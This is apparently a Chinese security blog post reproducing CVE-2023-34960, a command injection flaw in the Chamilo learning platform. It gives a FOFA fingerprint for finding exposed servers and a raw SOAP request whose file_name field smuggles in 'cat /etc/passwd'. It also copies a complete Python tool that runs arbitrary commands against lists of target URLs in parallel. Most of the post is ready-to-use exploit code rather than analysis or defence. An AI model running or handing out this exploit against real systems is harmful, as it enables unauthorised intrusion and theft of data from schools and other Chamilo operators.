十三の博客
0%

【漏洞复现】CVE-2023-34960-Chamilo

发表于 分类于

【漏洞复现】CVE-2023-34960-Chamilo

工具地址

https://github.com/Pari-Malam/CVE-2023-34960

漏洞介绍

Chamilo 是一个电子学习平台,也称为学习管理系统 (LMS)。Chamilo additional_webservices.php存在命令执行漏洞。

fofa指纹

1
"Chamilo"

版本

Chamilo <=1.11.18

复现

image-20230811194649111

poc

1
2
3
4
5
6
7
8
9
10
POST /main/webservices/additional_webservices.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Content-Length: 880
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip, deflate

<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="http://mail.cosecadvirtual.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{}`.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>

工具备份

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
# Author: Pari Malam

import argparse
import random
import warnings
import requests
import os
import xml.etree.ElementTree as ET
from sys import stdout
from concurrent.futures import ThreadPoolExecutor
from colorama import Fore, Style

warnings.filterwarnings("ignore")

FY = Fore.YELLOW
FG = Fore.GREEN
FR = Fore.RED
FC = Fore.CYAN
FW = Fore.WHITE

def clear():
    os.system('clear' if os.name == 'posix' else 'cls')

def mkdir():
    if not os.path.exists('Results'):
        os.mkdir('Results')

def banners():
    clear()
    stdout.write("                                                                                         \n")
    stdout.write(""+Fore.LIGHTRED_EX +"██████╗ ██████╗  █████╗  ██████╗  ██████╗ ███╗   ██╗███████╗ ██████╗ ██████╗  ██████╗███████╗   ██╗ ██████╗ \n")
    stdout.write(""+Fore.LIGHTRED_EX +"██╔══██╗██╔══██╗██╔══██╗██╔════╝ ██╔═══██╗████╗  ██║██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝   ██║██╔═══██╗\n")
    stdout.write(""+Fore.LIGHTRED_EX +"██║  ██║██████╔╝███████║██║  ███╗██║   ██║██╔██╗ ██║█████╗  ██║   ██║██████╔╝██║     █████╗     ██║██║   ██║\n")
    stdout.write(""+Fore.LIGHTRED_EX +"██║  ██║██╔══██╗██╔══██║██║   ██║██║   ██║██║╚██╗██║██╔══╝  ██║   ██║██╔══██╗██║     ██╔══╝     ██║██║   ██║\n")
    stdout.write(""+Fore.LIGHTRED_EX +"██║  ██║██╔══██╗██╔══██║██║   ██║██║   ██║██║╚██╗██║██╔══╝  ██║   ██║██╔══██╗██║     ██╔══╝     ██║██║   ██║\n")
    stdout.write(""+Fore.LIGHTRED_EX +"██████╔╝██║  ██║██║  ██║╚██████╔╝╚██████╔╝██║ ╚████║██║     ╚██████╔╝██║  ██║╚██████╗███████╗██╗██║╚██████╔╝\n")
    stdout.write(""+Fore.LIGHTRED_EX +"╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═══╝╚═╝      ╚═════╝ ╚═╝  ╚═╝ ╚═════╝╚══════╝╚═╝╚═╝ ╚═════╝ \n")
    stdout.write(""+Fore.YELLOW +"═════════════╦═════════════════════════════════╦════════════════════════════════════════════════════════════\n")
    stdout.write(""+Fore.YELLOW   +"╔════════════╩═════════════════════════════════╩═════════════════════════════╗\n")
    stdout.write(""+Fore.YELLOW   +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"AUTHOR             "+Fore.RED+"    |"+Fore.LIGHTWHITE_EX+"   PARI MALAM                                    "+Fore.YELLOW+"║\n")
    stdout.write(""+Fore.YELLOW   +"╔════════════════════════════════════════════════════════════════════════════╝\n")
    stdout.write(""+Fore.YELLOW   +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"GITHUB             "+Fore.RED+"    |"+Fore.LIGHTWHITE_EX+"   GITHUB.COM/PARI-MALAM                         "+Fore.YELLOW+"║\n")
    stdout.write(""+Fore.YELLOW   +"╚════════════════════════════════════════════════════════════════════════════╝\n")
    print(f"{FY}[CVE-2023-34960] - {FG}Unauthenticated Command Injection\n{Style.RESET_ALL}")
banners()

def users_agents():
    with open("lib/ua.txt", "r") as ua_file:
        user_agents = ua_file.readlines()
    user_agents = [ua.strip() for ua in user_agents if ua.strip()]
    return user_agents


def chamilo(url, command, user_agents):
    url = "http://" + url.strip("/")
    body = f'''<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{url}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <SOAP-ENV:Body>
        <ns1:wsConvertPpt>
            <param0 xsi:type="ns2:Map">
                <item>
                    <key xsi:type="xsd:string">file_data</key>
                    <value xsi:type="xsd:string"></value>
                </item>
                <item>
                    <key xsi:type="xsd:string">file_name</key>
                    <value xsi:type="xsd:string">`{{}}`.pptx'|" |{command}||a #</value>
                </item>
                <item>
                    <key xsi:type="xsd:string">service_ppt2lp_size</key>
                    <value xsi:type="xsd:string">720x540</value>
                </item>
            </param0>
        </ns1:wsConvertPpt>
    </SOAP-ENV:Body>
</SOAP-ENV:Envelope>'''

    headers = {'Content-Type': 'text/xml', 'User-Agent': random.choice(user_agents)}

    try:
        r = requests.post(f'{url}/main/webservices/additional_webservices.php', data=body, headers=headers, verify=False, timeout=5)
    except Exception as e:
        print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Invalid {Style.RESET_ALL}")
        return None

    if r.status_code == 200:
        try:
            pwned = ET.fromstring(r.text)
        except ET.ParseError:
            print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Invalid XML Response{Style.RESET_ALL}")
            return None

        tagged = pwned.find('.//return')
        if tagged is not None:
            content = tagged.text
            print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FG}[w00t!] - {FC}Vulnerable: {FW}{content}{Style.RESET_ALL}")
            return content
        else:
            print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Not found on execution. Check manually.{Style.RESET_ALL}")
            return None

    return None



def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL address (without 'http://' prefix)")
    parser.add_argument("-f", "--filename", help="File containing URLs")
    parser.add_argument("-c", "--command", help="Command to execute (optional)")
    parser.add_argument("-t", "--threads", type=int, default=10, help="Maximum number of concurrent threads")
    parser.add_argument("-o", "--output", help="Output file for saving the results")
    args = parser.parse_args()

    command = args.command or 'uname -a' or 'whoami'

    if args.filename:
        with open(args.filename, "r") as url_file:
            urls = url_file.readlines()
            urls = [url.strip() if url.startswith(("http://", "https://")) else url.strip() for url in urls]
    elif args.url:
        urls = [args.url]
    else:
        parser.error(f"{FR}Whut are you doin bro?")

    max_workers = args.threads

    user_agents = users_agents()

    results = []
    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        futures = [executor.submit(chamilo, url, command, user_agents) for url in urls]

        for future, url in zip(futures, urls):
            result = future.result()
            if result:
                results.append((url, result))
            else:
                print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Not Vulnerable{Style.RESET_ALL}")

    if args.output:
        with open(args.output, "a") as file:
            for url, result in results:
                file.write(f"URL: {url}\nResult: Results/{result}\n\n")


if __name__ == '__main__':
    main()